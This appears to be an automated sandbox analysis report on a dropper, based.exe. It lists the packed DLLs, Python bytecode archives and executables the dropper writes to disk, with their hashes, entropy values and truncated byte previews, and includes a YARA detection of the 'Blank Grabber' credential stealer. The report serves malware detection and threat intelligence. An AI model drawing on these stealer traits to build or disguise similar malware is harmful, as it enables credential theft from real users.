                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46064
                                                                  Entropy (8bit):7.796865894568779
                                                                  Encrypted:false
                                                                  SSDEEP:768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
                                                                  MD5:C24B301F99A05305AC06C35F7F50307F
                                                                  SHA1:0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
                                                                  SHA-256:C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
                                                                  SHA-512:936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):56816
                                                                  Entropy (8bit):7.830032396611692
                                                                  Encrypted:false
                                                                  SSDEEP:1536:z4eSBuhlC82gmmCm7jDCxU6esTzvIvQPnY7Syp96:kPAH4gZT7qxU6vTbIvQPnYv96
                                                                  MD5:5C0BDA19C6BC2D6D8081B16B2834134E
                                                                  SHA1:41370ACD9CC21165DD1D4AA064588D597A84EBBE
                                                                  SHA-256:5E7192C18AD73DAA71EFADE0149FBCAF734C280A6EE346525EA5D9729036194E
                                                                  SHA-512:B1B45FCBB1E39CB6BA7AC5F6828EE9C54767EABEEDCA35A79E7BA49FD17AD20588964F28D06A2DCF8B0446E90F1DB41D3FCA97D1A9612F6CC5EB816BD9DCDF8A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3c..3c..3c..K...3c..Fb..3c..Ff..3c..Fg..3c..F`..3c..Fb..3c..Ag..3c..Ab..3c.HZb..3c..3b.:3c..Fn..3c..Fc..3c..F...3c..Fa..3c.Rich.3c.........PE..d....(.b.........." .............p...........................................@............`.........................................H<.......9.......0.......................<.......................................&..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):105456
                                                                  Entropy (8bit):7.934837610567248
                                                                  Encrypted:false
                                                                  SSDEEP:1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
                                                                  MD5:604154D16E9A3020B9AD3B6312F5479C
                                                                  SHA1:27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
                                                                  SHA-256:3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
                                                                  SHA-512:37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33264
                                                                  Entropy (8bit):7.645283646866556
                                                                  Encrypted:false
                                                                  SSDEEP:768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
                                                                  MD5:8BA5202E2F3FB1274747AA2AE7C3F7BF
                                                                  SHA1:8D7DBA77A6413338EF84F0C4DDF929B727342C16
                                                                  SHA-256:0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
                                                                  SHA-512:D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):84976
                                                                  Entropy (8bit):7.919746609337062
                                                                  Encrypted:false
                                                                  SSDEEP:1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
                                                                  MD5:215ACC93E63FB03742911F785F8DE71A
                                                                  SHA1:D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
                                                                  SHA-256:FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
                                                                  SHA-512:9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23536
                                                                  Entropy (8bit):7.403882539076591
                                                                  Encrypted:false
                                                                  SSDEEP:384:PVOBO+iv3GmArtK6qsriOU3c4KFPsZa7gJXxeMIv7UiNqIYiSy1pCQe9g4i/8E9x:dOa1OtK/sriO2Q0phlIv7UixYiSyvcgB
                                                                  MD5:7B9F914D6C0B80C891FF7D5C031598D9
                                                                  SHA1:EF9015302A668D59CA9EB6EBC106D82F65D6775C
                                                                  SHA-256:7F80508EDFF0896596993BF38589DA38D95BC35FB286F81DF361B5BF8C682CAE
                                                                  SHA-512:D24C2FF50649FE604B09830FD079A6AD488699BB3C44EA7ACB6DA3F441172793E6A38A1953524F5570572BD2CF050F5FEE71362A82C33F9BB9381AC4BB412D68
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................C......Q............C......C......C......C......Rich............................PE..d...r(.b.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40944
                                                                  Entropy (8bit):7.702142071966167
                                                                  Encrypted:false
                                                                  SSDEEP:768:5p4KUJsCditRTP+g7X1eloezpnmhclAka9TdTsGW9Vm0NpDrZIvQwHmAYiSyveDd:5pghditRD+gReloMpnmaydTjWfbrZIvY
                                                                  MD5:1F7E5E111207BC4439799EBF115E09ED
                                                                  SHA1:E8B643F19135C121E77774EF064C14A3A529DCA3
                                                                  SHA-256:179EBBE9FD241F89DF31D881D9F76358D82CEDEE1A8FB40215C630F94EB37C04
                                                                  SHA-512:7F8A767B3E17920ACFAAFD4A7ED19B22862D8DF5BDF4B50E0D53DFBF32E9F2A08F5CDE97ACECB8ABF8F10FBBEDB46C1D3A0B9EB168D11766246AFE9E23ADA6FD
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rv...............ok.....Db......Db......Db......Db.......b...............e.......b.......b.......b.......b......Rich............PE..d....(.b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):48624
                                                                  Entropy (8bit):7.7486730117609754
                                                                  Encrypted:false
                                                                  SSDEEP:768:rmDbO/i0hrNkEQ2UOiUgc7T1S/lod9VmpMSIKGJaIv32wmMRnW/qb4NC1jTNpMPD:rmDboi0hKErTSAVmeAoaqmMREUcCZT4D
                                                                  MD5:E5111E0CB03C73C0252718A48C7C68E4
                                                                  SHA1:39A494EEFECB00793B13F269615A2AFD2CDFB648
                                                                  SHA-256:C9D4F10E47E45A23DF9EB4EBB4C4F3C5153E7977DC2B92A1F142B8CCDB0BB26B
                                                                  SHA-512:CC0A00C552B98B6B80FFA4CD7CD20600E0E368FB71E816F3665E19C28BA9239FB9107F7303289C8DB7DE5208AAEF8CD2159890996C69925176E6A04B6BECC9B1
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.V/..8|..8|..8|...|..8|X.9}..8|l..|..8|X.=}..8|X.<}..8|X.;}..8|.9}..8|.9}..8|..9|..8|.5}..8|.8}..8|..|..8|.:}..8|Rich..8|........PE..d....(.b.........." .............0......@................................................`.............................................P.......4............P..............(...........................................8...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):60912
                                                                  Entropy (8bit):7.835134717497924
                                                                  Encrypted:false
                                                                  SSDEEP:1536:4d+C+aTcxwivPlbXhef/o+K/l8/yyajCOGIvt7Mpv7SyCnF2:N1aAxwivPlL+Kt8IOnIvt7MVoF2
                                                                  MD5:A65B98BF0F0A1B3FFD65E30A83E40DA0
                                                                  SHA1:9545240266D5CE21C7ED7B632960008B3828F758
                                                                  SHA-256:44214A85D06628EB3209980C0F2B31740AB8C6EB402F804816D0DAE1EC379949
                                                                  SHA-512:0F70C2722722EB04B0B996BBAF7129955E38425794551C4832BAEC8844CDE9177695D4045C0872A8FB472648C62C9BD502C9240FACCA9FB469F5CBACBE3CA505
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.X.*.X.*.X.*.Q..^.*...+.Z.*.../.T.*.....P.*...).[.*...+.Z.*...+.\.*.X.+..*..+._.*...'.Z.*...*.Y.*.....Y.*...(.Y.*.RichX.*.........PE..d....(.b.........." ................`.....................................................`.........................................p...d....................P......................................................p...8...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                  Category:dropped
                                                                  Size (bytes):879899
                                                                  Entropy (8bit):5.683242093964832
                                                                  Encrypted:false
                                                                  SSDEEP:12288:EEHYKmIBWSxC6SacYgCA4a2Y80dqVwxffpEo4pJSLMNmQ:EEHYI1x1La2jpVwxffpEo40MNmQ
                                                                  MD5:D9A88C1228ECC6BDEE15AB1D8250B9F1
                                                                  SHA1:DD8F8DDE1AB2E05AEBCE3CB0B99C0B380AA3592C
                                                                  SHA-256:9DB062EEFFE2028281730237AAFD9401C7AAD3ECC781905E9539F1FF41114989
                                                                  SHA-512:FA8189705E42AD08CE50225F4545A1FF8D24BCF2E026F2F66B1CABE8FF697F5DEEDBA31A8C93E5D6988AACC78A3CDD5F29D383E34F821EFADACFAD3299E0E408
                                                                  Malicious:false
                                                                  Preview:PK..........!..0.............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                  Category:dropped
                                                                  Size (bytes):61432
                                                                  Entropy (8bit):7.707249710720783
                                                                  Encrypted:false
                                                                  SSDEEP:1536:i3tD2NmQARFCEdQ3pj2nZFq+6oO3TUPt+0GgHL75zLv:i3ZImRF9+inZFr6oB/GelLv
                                                                  MD5:7C28DD19EF44B3A823688161B08276E7
                                                                  SHA1:E1AC9AB4E6C481A2F8E035FB79BCD8C22E359226
                                                                  SHA-256:464C3238400D4344082DE1DEC14C6A0CB724A7E82D03DC5734BD973F3B420E66
                                                                  SHA-512:FC04F56ABE187601E6A03AE339C838BC903E942A8F309B475EF26EF0D86D4B2704D8BF07E22BEC04E5D7D739F622F0A52E82C68A24B182F19873226AEBDA560E
                                                                  Malicious:false
                                                                  Preview:PK........]..X)>f.............stub-o.pyco.......R..f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1105816
                                                                  Entropy (8bit):7.937977313955466
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Uk3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Uk3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
                                                                  MD5:3CC020BACEAC3B73366002445731705A
                                                                  SHA1:6D332AB68DCA5C4094ED2EE3C91F8503D9522AC1
                                                                  SHA-256:D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
                                                                  SHA-512:1D9B46D0331ED5B95DDA8734ABE3C0BD6F7FB1EC9A3269FEAB618D661A1644A0DC3BF8AC91778D5E45406D185965898FE87ABD3261A6F7F2968C43515A48562C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):24088
                                                                  Entropy (8bit):7.527291720504194
                                                                  Encrypted:false
                                                                  SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                                  MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                                  SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                                  SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                                  SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):205216
                                                                  Entropy (8bit):7.9213750503510605
                                                                  Encrypted:false
                                                                  SSDEEP:3072:z4A92MK5MfGhqR1qnW/Bby+h0lE4GIp8/Mgfg68oPrRHUy1oygvaO9JSj8Hrd+/g:lSMehqKnEKlEARNYRP1lgl9jHrw/BgX
                                                                  MD5:7F77A090CB42609F2EFC55DDC1EE8FD5
                                                                  SHA1:EF5A128605654350A5BD17232120253194AD4C71
                                                                  SHA-256:47B63A9370289D2544ABC5A479BFB27D707AE7DB4F3F7B6CC1A8C8F57FD0CF1F
                                                                  SHA-512:A8A06A1303E76C76D1F06B689E163BA80C1A8137ADAC80FAB0D5C1C6072A69D506E0360D8B44315EF1D88CBD0C9AC95C94D001FAD5BC40727F1070734BBBBE63
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .........P...P..@....`...................................p............`..........................................&..4@...#....... ..........|M...........f......................................@...@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc....P... ...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1507312
                                                                  Entropy (8bit):7.992414868541998
                                                                  Encrypted:true
                                                                  SSDEEP:24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
                                                                  MD5:B93EDA8CC111A5BDE906505224B717C3
                                                                  SHA1:5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
                                                                  SHA-256:EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
                                                                  SHA-512:B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4...F...4...4...5...A...4...A...4...Al..4...A...4..Rich.4..........................PE..d...\(.b.........." .............P/..XE..`/..................................PF...........`...........................................E......yE.d....pE......PB.h............@F......................................dE.8...........................................UPX0.....P/.............................UPX1.........`/.....................@....rsrc........pE.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):630736
                                                                  Entropy (8bit):6.409476333013752
                                                                  Encrypted:false
                                                                  SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                  MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                  SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                  SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                  SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):456
                                                                  Entropy (8bit):4.447296373872587
                                                                  Encrypted:false
                                                                  SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                  MD5:4531984CAD7DACF24C086830068C4ABE
                                                                  SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                  SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                  SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, Author: Joe Security
                                                                  Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23536
                                                                  Entropy (8bit):7.33649667835335
                                                                  Encrypted:false
                                                                  SSDEEP:384:NiRf5SV1a/dSyQMZa7gJXUOjMIv7Gi64IYiSy1pCQaKEJ94i/8E9VFShf:NGxSVQFS0pEOgIv7GimYiSyvQJ9eEwf
                                                                  MD5:3CDFDB7D3ADF9589910C3DFBE55065C9
                                                                  SHA1:860EF30A8BC5F28AE9C81706A667F542D527D822
                                                                  SHA-256:92906737EFF7FF33B9E2A72D2A86E4BD80A35018C8E40BB79433A8EA8ECE3932
                                                                  SHA-512:1FE2C918E9CE524B855D7F38D4C69563F8B8C44291EEA1DC98F04E5EBDC39C8F2D658A716429051FB91FED0B912520929A0B980C4F5B4ECB3DE1C4EB83749A45
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fa!.".O.".O.".O.+x.. .O.puN. .O.puJ.).O.puK.*.O.puL.&.O..uN. .O.".N.b.O..rN.'.O..uB.#.O..uO.#.O..u..#.O..uM.#.O.Rich".O.................PE..d....(.b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                  Process:C:\ProgramData\Microsoft\based.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):627184
                                                                  Entropy (8bit):7.993580071159261
                                                                  Encrypted:true
                                                                  SSDEEP:12288:RGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBWpE:RsKl/Ew166OtHxaDJJwZATkrcB9JcgWa
                                                                  MD5:59ED17799F42CC17D63A20341B93B6F6
                                                                  SHA1:5F8B7D6202B597E72F8B49F4C33135E35AC76CD1
                                                                  SHA-256:852B38BD2D05DD9F000E540D3F5E4962E64597EB864A68AA8BB28CE7008E91F1
                                                                  SHA-512:3424AD59FD71C68E0AF716B7B94C4224B2ABFB11B7613F2E565F5D82F630E89C2798E732376A3A0E1266D8D58730B2F76C4E23EFE03C47A48CBF5F0FC165D333
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
